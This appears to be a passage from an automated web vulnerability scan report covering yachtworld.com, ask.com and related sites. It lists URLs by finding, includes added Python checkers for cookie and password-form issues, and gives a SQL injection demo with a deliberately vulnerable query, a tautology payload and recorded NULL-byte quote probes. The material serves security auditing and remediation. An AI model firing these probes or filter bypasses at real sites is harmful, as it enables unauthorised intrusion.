9.61. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States

9.62. http://www.yachtworld.com/boats/2007/Regulator-Center-Console-2030806/VA/United-States

9.63. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States

9.64. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States

9.65. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States

9.66. http://www.yachtworld.com/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy

9.67. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States

9.68. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp

9.69. https://www.yachtworld.com/

9.70. http://wzus1.ask.com/i/i.gif
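
The three cookie categories above (5, SSL cookie without secure flag; 8, cookie scoped to parent domain; 9, cookie without HttpOnly flag) can all be decided from a single Set-Cookie header plus the URL of the response that set it. The following checker is an added example, not part of the crawler or of any site listed in this report; it uses only the Python standard library, and the sample responses at the bottom are constructed for illustration rather than captured from the hosts above.

```python
"""Classify one Set-Cookie header against the three cookie findings used in
this report: Secure missing on an HTTPS response, HttpOnly missing, and a
Domain attribute that widens the cookie to a parent of the responding host.
Added example; the sample headers below are constructed, not captured."""
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class Cookie:
    name: str
    # lower-cased attribute name -> value ('' for flag attributes such as Secure)
    attrs: dict = field(default_factory=dict)


def parse_set_cookie(header: str) -> Cookie:
    """Split one Set-Cookie value into the cookie name and its attributes."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    cookie = Cookie(name)
    for part in parts[1:]:
        if not part:
            continue
        key, _, value = part.partition("=")
        cookie.attrs[key.strip().lower()] = value.strip()
    return cookie


def is_parent_domain(cookie_domain: str, host: str) -> bool:
    """True when Domain= covers more than the responding host, e.g.
    Domain=.example.com on a response from www.example.com."""
    dom = cookie_domain.lower().lstrip(".")
    host = host.lower()
    return dom != host and host.endswith("." + dom)


def check_cookie(url: str, header: str) -> list:
    """Return the report finding names that apply to this Set-Cookie header."""
    parts = urlsplit(url)
    cookie = parse_set_cookie(header)
    findings = []
    # A cookie set over TLS without Secure will also be sent over plain HTTP.
    if parts.scheme == "https" and "secure" not in cookie.attrs:
        findings.append("SSL cookie without secure flag set")
    # Without HttpOnly, script on the page (e.g. via the XSS findings above)
    # can read the cookie through document.cookie.
    if "httponly" not in cookie.attrs:
        findings.append("Cookie without HttpOnly flag set")
    domain = cookie.attrs.get("domain")
    if domain and is_parent_domain(domain, parts.hostname or ""):
        findings.append("Cookie scoped to parent domain")
    return findings


# Constructed sample responses (hostnames are placeholders, not real traffic).
SAMPLES = [
    ("https://www.example.com/secure/login", "JSESSIONID=abc123; Path=/"),
    ("http://www.example.com/web", "wz_uid=42; Domain=.example.com; Path=/"),
    ("https://www.example.com/", "sid=xyz; Secure; HttpOnly; Path=/"),
]

if __name__ == "__main__":
    for url, hdr in SAMPLES:
        print(url, parse_set_cookie(hdr).name, check_cookie(url, hdr) or ["ok"])
```

The parent-domain check is deliberately a warning rather than a hard failure: a cookie on .example.com is legitimate when every subdomain is trusted, but here the same wz_uid and wz_sid cookies that are scoped to the parent domain are also reflected in the XSS findings of section 3, which is the combination a reviewer should look at first.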

10. Password field with autocomplete enabled

10.1. http://malsup.com/jquery/form/

10.2. http://malsup.com/jquery/form/

10.3. http://malsup.com/jquery/form/

10.4. http://malsup.com/jquery/form/

10.5. http://malsup.com/jquery/form/

10.6. http://malsup.com/jquery/form/

10.7. http://www.ask.com/ja-ask-dialog

10.8. http://www.ask.com/ja-ask-dialog

10.9. http://www.ask.com/ja-ask-dialog

10.10. http://www.ask.com/jsignin

10.11. http://www.ask.com/jsignin

10.12. http://www.ask.com/settings

10.13. http://www.ask.com/settings

10.14. http://www.dynamicdrive.com/forums/showthread.php

10.15. https://www.linkedin.com/secure/login

10.16. http://www.reel-time.com/forum/showthread.php

10.17. http://www.yachtworld.com/boat-loans/index.jsp

10.18. https://www.yachtworld.com/boat-loans/index.jsp

10.19. https://www.yachtworld.com/boat-loans/myLoan.jsp
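
Sections 4 (cleartext submission of password), 7 (password field submitted using GET) and 10 (password field with autocomplete enabled) are all properties of the HTML form that contains a type="password" input: where its action resolves to, which method it uses, and whether autocomplete is switched off on the field or the form. The auditor below is an added example rather than code from the crawler or from any site in this report; it relies only on the standard library, and the page URL and HTML it runs over are constructed placeholders.

```python
"""Audit the password forms in a page for the three findings listed in this
report: submission over cleartext HTTP, submission with GET (credentials land
in the URL, logs and Referer), and autocomplete left enabled.
Added example; SAMPLE_HTML is constructed, not taken from any listed site."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class PasswordFormAuditor(HTMLParser):
    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.form = None          # attributes of the <form> currently open
        self.findings = []        # (finding name, detail) tuples

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v if v is not None else "") for k, v in attrs}
        if tag == "form":
            self.form = a
        elif tag == "input" and a.get("type", "").lower() == "password":
            self._check_password_field(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self.form = None

    def _check_password_field(self, field):
        form = self.form or {}
        # An empty or missing action submits back to the page itself.
        target = urljoin(self.page_url, form.get("action", ""))
        if urlsplit(target).scheme != "https":
            self.findings.append(("Cleartext submission of password", target))
        # HTML defaults the form method to GET when it is not given.
        if form.get("method", "get").lower() == "get":
            self.findings.append(("Password field submitted using GET method", target))
        # autocomplete can be set on the field or inherited from the form.
        ac = field.get("autocomplete", form.get("autocomplete", "on"))
        if ac.lower() != "off":
            self.findings.append(("Password field with autocomplete enabled", field.get("name", "")))


def audit_password_forms(page_url: str, html: str) -> list:
    auditor = PasswordFormAuditor(page_url)
    auditor.feed(html)
    return auditor.findings


# Constructed sample page: one login form posting to a relative action over
# HTTP, one settings form that uses GET but is served over HTTPS.
SAMPLE_URL = "http://www.example.com/jsignin"
SAMPLE_HTML = """
<form action="/jsignin" method="post">
  <input type="text" name="user">
  <input type="password" name="pass">
</form>
<form action="https://www.example.com/settings" method="get">
  <input type="password" name="newpw" autocomplete="off">
</form>
"""

if __name__ == "__main__":
    for finding, detail in audit_password_forms(SAMPLE_URL, SAMPLE_HTML):
        print(f"{finding}: {detail}")
```

One caveat when reading section 10 today: current browsers ignore autocomplete="off" on login password fields in favour of their own password managers, so the attribute no longer prevents credential storage. The cleartext and GET findings, by contrast, describe what actually leaves the browser and remain the ones worth fixing first, by pointing the form at an HTTPS action and using POST.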

11. Source code disclosure

12. Cross-domain Referer leakage

12.1. http://hire.jobvite.com/CompanyJobs/Careers.aspx

12.2. http://jqueryui.com/themeroller/

12.3. http://www.ask.com/

12.4. http://www.ask.com/

12.5. http://www.ask.com/

12.6. http://www.ask.com/

12.7. http://www.ask.com/ans

12.8. http://www.ask.com/answers

12.9. http://www.ask.com/answers/000/Notification

12.10. http://www.ask.com/homepage

12.11. http://www.ask.com/homepage

12.12. http://www.ask.com/iPhone

12.13. http://www.ask.com/ja-ask-dialog

12.14. http://www.ask.com/jsignin

12.15. http://www.ask.com/pictures

12.16. http://www.ask.com/pictureslanding

12.17. http://www.ask.com/pictureslanding

12.18. http://www.ask.com/settings

12.19. http://www.ask.com/skins

12.20. http://www.ask.com/videos

12.21. http://www.ask.com/videos

12.22. http://www.ask.com/web

12.23. http://www.ask.com/web

12.24. http://www.ask.com/web

12.25. http://www.ask.com/web

12.26. http://www.ask.com/web

12.27. http://www.ask.com/web

12.28. http://www.ask.com/web

12.29. http://www.ask.com/web

12.30. http://www.ask.com/web

12.31. http://www.ask.com/web

12.32. http://www.ask.com/web

12.33. http://www.ask.com/web

12.34. http://www.ask.com/web

12.35. http://www.ask.com/web

12.36. http://www.ask.com/webadvanced

12.37. http://www.boats.com/boat-transport/index.jsp

12.38. http://www.dynamicdrive.com/forums/showthread.php

12.39. https://www.linkedin.com/secure/login

12.40. http://www.reel-time.com/forum/showthread.php

12.41. http://www.yachtworld.com/core/globalnav/emailForm.jsp

12.42. http://www.yachtworld.com/core/help/searchHelp.jsp

12.43. http://www.yachtworld.com/core/listing/advancedSearch.jsp

12.44. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp

12.45. http://www.yachtworld.com/core/listing/cache/searchResults.jsp

12.46. http://www.yachtworld.com/core/listing/displayPhoto.jsp

12.47. http://www.yachtworld.com/core/listing/photoGallery.jsp

12.48. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

12.49. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

12.50. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

12.51. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp

12.52. http://www.yachtworld.com/core/rendering/email-boat.htm

12.53. http://www.yachtworld.com/core/sponsored-boats/search.htm

12.54. http://www.yachtworld.com/leaving_yw.cgi

12.55. http://wzus1.ask.com/r

12.56. http://wzus1.ask.com/r

12.57. http://wzus1.ask.com/r

12.58. http://wzus1.ask.com/r

13. Cross-domain script include

13.1. http://govguru.com/north-carolina/boat-registration

13.2. http://hire.jobvite.com/CompanyJobs/Careers.aspx

13.3. http://jqueryui.com/about

13.4. http://jqueryui.com/themeroller/

13.5. http://malsup.com/jquery/cycle/

13.6. http://malsup.com/jquery/form/

13.7. http://www.ask.com/

13.8. http://www.ask.com/about

13.9. http://www.ask.com/about/legal/privacy

13.10. http://www.ask.com/about/legal/terms

13.11. http://www.ask.com/advertise

13.12. http://www.ask.com/answers

13.13. http://www.ask.com/answers/000/Notification

13.14. http://www.ask.com/homepage

13.15. http://www.ask.com/jsignin

13.16. http://www.ask.com/pictures

13.17. http://www.ask.com/pictureslanding

13.18. http://www.ask.com/questionoftheday

13.19. http://www.ask.com/settings

13.20. http://www.ask.com/videos

13.21. http://www.ask.com/web

13.22. http://www.boats.com/boat-transport/index.jsp

13.23. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html

13.24. http://www.dynamicdrive.com/dynamicindex1/ddlevelsmenu/

13.25. http://www.dynamicdrive.com/forums/showthread.php

13.26. http://www.reel-time.com/forum/showthread.php

13.27. http://www.yachtworld.com/boat-content/2011/01/a-new-bertram-flagship-the-800/

13.28. http://www.yachtworld.com/boat-loans/finance/help_boatsbank.jsp

13.29. http://www.yachtworld.com/boat-loans/finance/rates.jsp

13.30. http://www.yachtworld.com/boat-loans/finance/what_to_expect.jsp

13.31. http://www.yachtworld.com/boat-loans/index.jsp

13.32. http://www.yachtworld.com/boat-loans/partner_program.jsp

13.33. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

13.34. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States

13.35. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States

13.36. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

13.37. https://www.yachtworld.com/boat-loans/consumer_loan_processing.html

13.38. https://www.yachtworld.com/boat-loans/forgot_password.jsp

13.39. https://www.yachtworld.com/boat-loans/index.jsp

13.40. https://www.yachtworld.com/boat-loans/myLoan.jsp

14. File upload functionality

15. Email addresses disclosed

15.1. http://govguru.com/common/res/js/s_code.js

15.2. http://hire.jobvite.com/CompanyJobs/careers_8.js

15.3. http://jqueryui.com/about

15.4. http://www.ask.com/about/legal/terms

15.5. http://www.ask.com/advertise

15.6. http://www.reel-time.com/forum/showthread.php

15.7. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

15.8. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

15.9. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States

15.10. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States

15.11. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States

15.12. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States

15.13. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States

15.14. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States

15.15. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States

15.16. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States

15.17. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States

15.18. http://www.yachtworld.com/boats/category/type/builder/model/United+States

15.19. http://www.yachtworld.com/boats/category/type/builder/model/United+States/

15.20. http://www.yachtworld.com/boats/category/type/builder/model/United+States/California/1

15.21. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Connecticut/1

15.22. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Florida/1

15.23. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Maine/1

15.24. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Maryland/1

15.25. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Massachusetts/1

15.26. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Michigan/1

15.27. http://www.yachtworld.com/boats/category/type/builder/model/United+States/New+Jersey/1

15.28. http://www.yachtworld.com/boats/category/type/builder/model/United+States/New+York/1

15.29. http://www.yachtworld.com/boats/category/type/builder/model/United+States/North+Carolina/1

15.30. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Ohio/1

15.31. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Rhode+Island/1

15.32. http://www.yachtworld.com/boats/category/type/builder/model/United+States/South+Carolina/1

15.33. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Texas/1

15.34. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Virginia/1

15.35. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Washington/1

15.36. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Wisconsin/1

15.37. http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_CA.html.en

15.38. http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_FL.html.en

15.39. http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_NY.html.en

15.40. http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_TX.html.en

15.41. http://www.yachtworld.com/core/globalnav/privacy.jsp

15.42. http://www.yachtworld.com/core/globalnav/termOfUse.jsp

15.43. http://www.yachtworld.com/core/gzip_1874314158/bundles/ywTemplate1Bundle.js

15.44. http://www.yachtworld.com/core/listing/cache/searchResults.jsp

15.45. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

15.46. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

15.47. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

15.48. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

15.49. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

15.50. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp

15.51. http://www.yachtworld.com/core/rendering/email-boat.htm

15.52. http://www.yachtworld.com/core/rendering/print-boat.htm

15.53. http://www.yachtworld.com/core/rendering/print-boat.htm

15.54. https://www.yachtworld.com/core/globalnav/privacy.jsp

15.55. https://www.yachtworld.com/core/globalnav/termOfUse.jsp

15.56. https://www.yachtworld.com/core/listing/cache/searchResults.jsp

16. Cacheable HTTPS response

16.1. https://www.yachtworld.com/

16.2. https://www.yachtworld.com/boat-loans/forgot_password.jsp

16.3. https://www.yachtworld.com/boat-loans/index.jsp

16.4. https://www.yachtworld.com/boat-loans/myLoan.jsp

16.5. https://www.yachtworld.com/byp/categories/BrokerageSales/BoatDealers.html.en

16.6. https://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms.html.en

16.7. https://www.yachtworld.com/byp/categories/Surveyors/index.html.en

16.8. https://www.yachtworld.com/byp/searchbyp.cgi.en

16.9. https://www.yachtworld.com/core/globalnav/contactUs.jsp

16.10. https://www.yachtworld.com/core/globalnav/copyright.jsp

16.11. https://www.yachtworld.com/core/globalnav/emailForm.jsp

16.12. https://www.yachtworld.com/core/globalnav/help.jsp

16.13. https://www.yachtworld.com/core/globalnav/localeSelect.jsp

16.14. https://www.yachtworld.com/core/globalnav/privacy.jsp

16.15. https://www.yachtworld.com/core/globalnav/termOfUse.jsp

16.16. https://www.yachtworld.com/core/listing/advancedSearch.jsp

16.17. https://www.yachtworld.com/core/listing/cache/searchResults.jsp

16.18. https://www.yachtworld.com/core/personalboatshopper/pbs.jsp

16.19. https://www.yachtworld.com/core/services/services.jsp

16.20. https://www.yachtworld.com/globalnav/sitemap.html.en

16.21. https://www.yachtworld.com/leaving_yw.cgi

17. HTML does not specify charset

17.1. http://ads.pointroll.com/PortalServe/

17.2. http://jqueryui.com/about

17.3. http://jqueryui.com/themeroller/

17.4. http://www.boats.com/includes/script_declarations.jsp

17.5. http://wzus1.ask.com/i/b.html

17.6. http://wzus1.ask.com/i/i.gif

17.7. http://wzus1.ask.com/r

18. Content type incorrectly stated

18.1. http://ss.ask.com/favicon.ico

18.2. http://ss.ask.com/query

18.3. http://www.boats.com/includes/script_declarations.jsp

18.4. http://www.yachtworld.com/clarkslanding/images/e323276.jpg

18.5. http://www.yachtworld.com/clarkslanding/images/e86210.jpg

18.6. http://www.yachtworld.com/core/recentlyviewedboatsSRP

19. Content type is not specified



1. SQL injection
There are 8 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure.

You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s41495727926958 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.yachtworld.com
Path:   /b/ss/deyachtworld/1/H.17/s41495727926958

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that in the two exchanges recorded below both responses are HTTP 404s from the Omniture collection server: the single-quote request drew the server's generic Not Found page (including a failed ErrorDocument lookup), the double-quote request an empty 404 body. The "error message" is therefore a web-server response rather than a database error, which is why the confidence is only Tentative; confirm by hand against a request the endpoint actually processes before treating this as SQL injection.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
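The quote / double-quote probe described in the issue detail above, alongside the parameterised-query fix from the remediation background, as an added example that is not part of the original report and not the yachtworld.com application's code. It uses Python's sqlite3 module against an in-memory table of constructed listing rows; the table, its columns, the row values and the two lookup functions are assumptions for illustration only.

```python
import sqlite3

# Constructed sample data for the demonstration: a tiny in-memory listings table.
# The table, its columns and the row values are assumptions, not yachtworld.com data.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE boats (id TEXT PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO boats VALUES (?, ?)",
        [("2262662", "Regulator 32 Forward Seating"),
         ("2266476", "Regulator 32 with trailer")],
    )
    return conn


def lookup_vulnerable(conn, boat_id):
    """Splices the caller's value straight into the SQL text (the flaw the report describes)."""
    sql = "SELECT name FROM boats WHERE id = '" + boat_id + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, boat_id):
    """Parameterised form: the query structure is fixed first and the value is bound
    second, so the value can never alter the structure."""
    sql = "SELECT name FROM boats WHERE id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (boat_id,))]


def probe(lookup, conn, base="2266476"):
    """The scanner's quote heuristic: send the value with one trailing quote, then with
    two. Returns (single_quote_errored, double_quote_errored). A lone quote leaves the
    string literal unterminated; a doubled quote is a valid escaped quote inside it."""
    outcome = []
    for suffix in ("'", "''"):
        try:
            lookup(conn, base + suffix)
            outcome.append(False)
        except sqlite3.Error:
            outcome.append(True)
    return tuple(outcome)


def looks_injectable(lookup, conn):
    """True when the error appears with one quote and disappears with two: the pattern
    the report flags as 'appears to be vulnerable'."""
    single, double = probe(lookup, conn)
    return single and not double


if __name__ == "__main__":
    db = make_db()
    print("concatenated query injectable:", looks_injectable(lookup_vulnerable, db))
    print("parameterised query injectable:", looks_injectable(lookup_safe, db))
    # The same kind of value used as a real payload: every row comes back from the
    # concatenated query, nothing from the parameterised one.
    print(lookup_vulnerable(db, "x' OR '1'='1"))
    print(lookup_safe(db, "x' OR '1'='1"))
```

The signal the heuristic relies on is a database syntax error that a doubled quote repairs; in the concatenated lookup the single quote raises sqlite3.OperationalError and the doubled quote does not, while the parameterised lookup accepts both values as plain data. A generic web-server 404, as in the responses recorded for this finding, gives the same appear/disappear pattern without any database being involved, which is why the probe alone cannot confirm the issue.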

Request 1

GET /b/ss/deyachtworld/1/H.17%00'/s41495727926958?AQB=1&ndh=1&t=27/0/2011%2013%3A20%3A25%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Boat_Details_US&g=http%3A//www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States&cc=USD&ch=Boats&server=ywapp05&events=event11%2Cevent2&c1=Boat%20Details&h1=Boats%7CAdvanced%20Search&v3=Boat_Details_US&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v28=www.yachtworld.com&c32=2266476&v32=2266476&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156025554%7C1298748025554%3B%20s_lv%3D1296156025556%7C1390764025556%3B%20s_lv_s%3DFirst%2520Visit%7C1296157825556%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:32:04 GMT
Server: Omniture DC/2.0.0
Content-Length: 424
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/deyachtworld/1/H.17 was not found on this serve
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/deyachtworld/1/H.17%00''/s41495727926958?AQB=1&ndh=1&t=27/0/2011%2013%3A20%3A25%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Boat_Details_US&g=http%3A//www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States&cc=USD&ch=Boats&server=ywapp05&events=event11%2Cevent2&c1=Boat%20Details&h1=Boats%7CAdvanced%20Search&v3=Boat_Details_US&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v28=www.yachtworld.com&c32=2266476&v32=2266476&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156025554%7C1298748025554%3B%20s_lv%3D1296156025556%7C1390764025556%3B%20s_lv_s%3DFirst%2520Visit%7C1296157825556%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:32:04 GMT
Server: Omniture DC/2.0.0
xserver: www653
Content-Length: 0
Content-Type: text/html


1.2. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s42079387209378 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.yachtworld.com
Path:   /b/ss/deyachtworld/1/H.17/s42079387209378

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As with 1.1, both responses recorded below are HTTP 404s from the Omniture collection server (a generic Not Found page with a failed ErrorDocument lookup, then an empty 404 body), so the "error message" is the web server's and not a database's; confirm by hand before treating this as SQL injection.

